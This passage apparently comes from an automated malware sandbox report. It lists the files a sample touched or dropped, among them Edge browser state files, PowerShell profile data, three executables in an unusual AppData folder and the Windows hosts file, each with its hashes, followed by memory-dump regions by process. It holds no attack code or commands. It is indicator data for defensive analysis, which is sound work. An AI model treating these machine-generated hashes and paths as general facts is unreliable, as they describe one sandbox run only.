                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\b063b10c-aa74-40e9-8097-2e7a6b21975e\index-dir\the-real-index~RFe57d958.TMP

                                        Filesize

                                        1KB

                                        MD5

                                        631565af58d3003ef340c58340396499

                                        SHA1

                                        819a8ee18edc8dd42d88da8a1095a10740c3b464

                                        SHA256

                                        d8bc1b80ad79b421fcb2ed9282d54a428a5646eba37c7f8cf865e2962d87733c

                                        SHA512

                                        671bf38cba63ed43ebf28f6b632c0ec88ce2ccf8e09f0a0e34cb36f2377844e9a1f83d6770ece9ee2f26903b83bb3f1e78fc8a5c6909dca273e542174e81d296

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        40KB

                                        MD5

                                        2433f0d62df882215635dfdac57588ab

                                        SHA1

                                        9d40f0631a0a2ae969a2b46fd032af677bf4f8de

                                        SHA256

                                        92ed12b7b2b06bd59a7b6a4ab43922a2ae016feeb3bc402029d37203b203ed5c

                                        SHA512

                                        a608c4a8b52da98a85fd3f1408e4824617ed6fb6cc1263447a51ca1e5de62c3e952755168232f94ab6ecfce9ae6a221a5b0d7315c0be9059e173bec280578ded

                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                        Filesize

                                        40KB

                                        MD5

                                        76c0500a59693d287b8fba1fd104185c

                                        SHA1

                                        bc65c6a94519c972eeb99054870aad5e4b93cd27

                                        SHA256

                                        ee07902a172181ed8e411a77ca9ae98667e9c32907b2181874f18eee7a8e67ca

                                        SHA512

                                        5f09d0029414890610779bdfdcc076d9ee6cd98fd5a8494d5e1443044057b8fa46dd183e3d2572d4e44b3e5b64e62b4cb9bddebaa39f338985d6622f79f323c7

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        944B

                                        MD5

                                        fdbc304f3d894fc63c481c99aa258017

                                        SHA1

                                        47cd3a7cae4dbf6bdd92532bbb69224a75221b86

                                        SHA256

                                        58c02d17c622f9ffc1744d26a3be409d7a95796119bcea540e54dcf687c8abb3

                                        SHA512

                                        18923c6b620a47d59377bdffd8dbf9717750a52980530cd67c169704649e471b1583eda2045cc7db84e560a9672759f8ea0c3a5ab45d4f328e17aa6e0ca5fae1

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        fb5a1f7acdd84537b11c5117db52b447

                                        SHA1

                                        4925429c1b83ab71befd5c4ace9509a9cceeaa32

                                        SHA256

                                        e83b77f3cffaa7f1d0b3b5330200a6ccabe5e98678611d6361f328515e989ab1

                                        SHA512

                                        dfaa56da4a67a085d0697f35ae8ce664602d1ac96b5e12ff6e7adc845ee6e848cdef0e92c00728d927689ed3d9c7fdfbfde9e2368a446570e4549ecee04a0e17

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        9843d1de2b283224f4f4b8730ccc919f

                                        SHA1

                                        c053080262aef325e616687bf07993920503b62b

                                        SHA256

                                        409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1

                                        SHA512

                                        13d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de

                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Filesize

                                        1KB

                                        MD5

                                        2419d068e09423d5e7edec9bb8010870

                                        SHA1

                                        445b4a6ebefa37ee91ff5a18a3b8e6ae6af40fba

                                        SHA256

                                        d308e6cb382517e03b6773d345b2e68e57fe80ce636901ab95da87ba29d6c0ac

                                        SHA512

                                        053cb92ad73f842f22200dd39082a22474277816b1de63a722b881225218849e1d5038fe3caec8f2067c5e6ab593917d1ad7278038c154077e7e2b14d72f3264

                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hl31ftaf.0zq.ps1

                                        Filesize

                                        60B

                                        MD5

                                        d17fe0a3f47be24a6453e9ef58c94641

                                        SHA1

                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                        SHA256

                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                        SHA512

                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      • C:\Users\Admin\AppData\Local\jejppb\innkpa.exe

                                        Filesize

                                        5.1MB

                                        MD5

                                        cb1ab881df77d5e59c9cd71a042489dd

                                        SHA1

                                        948c65951d6f888dacb567d9938bb21492d82097

                                        SHA256

                                        23fa323eea0a8a6367e810996a54337197c1750a9a0a53c306c8c4022dd94780

                                        SHA512

                                        84a1030a3d2f55ad6fc576bb122d98428485986c1fe4bbd41e13ac1ce588dc3f1034fbe18139f23f9422d520815b4e437b6ac7b78960d0b6c52c56acb87f9c31

                                      • C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe

                                        Filesize

                                        27KB

                                        MD5

                                        2ff8e057084b5c180e9b447e08d2d747

                                        SHA1

                                        92b35c1b8f72c18dd3e945743cb93e8531d73e2b

                                        SHA256

                                        accdada8772018e58baa0ecb3e79c507eb09c7d67f22f59e323c74b51eac9072

                                        SHA512

                                        7ae542c6ca36e5ed934ca503f3489144e0ec7d81ad246af88bb525cb494f6725df0aa9131c72afe79ff02364dd65ec7a3ffb01846f99836feff06746193af251

                                      • C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe

                                        Filesize

                                        137KB

                                        MD5

                                        9d6c51f4f9e0132ea410b8db3c241be6

                                        SHA1

                                        8aa67a34b626f61e6ab053f8a51e7c5142865fe4

                                        SHA256

                                        61d2f6f7051c9b06c87e7c6f8c596b8e4d88382278e4d34d81520bc47e2cba31

                                        SHA512

                                        479dd4703e0b462d7c0cfee5bdcaed97d8888f6c1fb04aad6e6d1a098b5a61701dd19a2635c64cb4cc77038445e5e498fdf8af75d728e5a58988047d3c4e2790

                                      • C:\Windows\system32\drivers\etc\hosts

                                        Filesize

                                        3KB

                                        MD5

                                        00930b40cba79465b7a38ed0449d1449

                                        SHA1

                                        4b25a89ee28b20ba162f23772ddaf017669092a5

                                        SHA256

                                        eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                                        SHA512

                                        cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                                      • memory/896-117-0x0000000000400000-0x000000000040E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/1088-631-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-635-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-662-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-661-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-629-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-630-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-632-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-636-0x00000000013F0000-0x0000000001410000-memory.dmp

                                        Filesize

                                        128KB

                                      • memory/1088-639-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-633-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-634-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-637-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-638-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-640-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1088-641-0x0000000140000000-0x0000000140835000-memory.dmp

                                        Filesize

                                        8.2MB

                                      • memory/1216-11-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1216-1-0x000001D5D4F60000-0x000001D5D4F82000-memory.dmp

                                        Filesize

                                        136KB

                                      • memory/1216-12-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1216-13-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1216-0-0x00007FFA56733000-0x00007FFA56735000-memory.dmp

                                        Filesize

                                        8KB

                                      • memory/1216-16-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/1872-608-0x00000292F0AA0000-0x00000292F0AAA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1872-613-0x00000292F3090000-0x00000292F30AA000-memory.dmp

                                        Filesize

                                        104KB

                                      • memory/1872-606-0x00000292F0A80000-0x00000292F0A9C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/1872-607-0x00000292F2E50000-0x00000292F2F05000-memory.dmp

                                        Filesize

                                        724KB

                                      • memory/1872-609-0x00000292F3050000-0x00000292F306C000-memory.dmp

                                        Filesize

                                        112KB

                                      • memory/1872-612-0x00000292F0AB0000-0x00000292F0ABA000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1872-616-0x00000292F3080000-0x00000292F308A000-memory.dmp

                                        Filesize

                                        40KB

                                      • memory/1872-615-0x00000292F3070000-0x00000292F3076000-memory.dmp

                                        Filesize

                                        24KB

                                      • memory/1872-614-0x00000292F0AC0000-0x00000292F0AC8000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/4560-654-0x0000000000400000-0x000000000040E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/4940-33-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4940-18-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4940-24-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/4940-30-0x00007FFA56730000-0x00007FFA571F1000-memory.dmp

                                        Filesize

                                        10.8MB

                                      • memory/5576-625-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/5576-624-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/5576-621-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/5576-623-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/5576-627-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB

                                      • memory/5576-622-0x0000000140000000-0x000000014000E000-memory.dmp

                                        Filesize

                                        56KB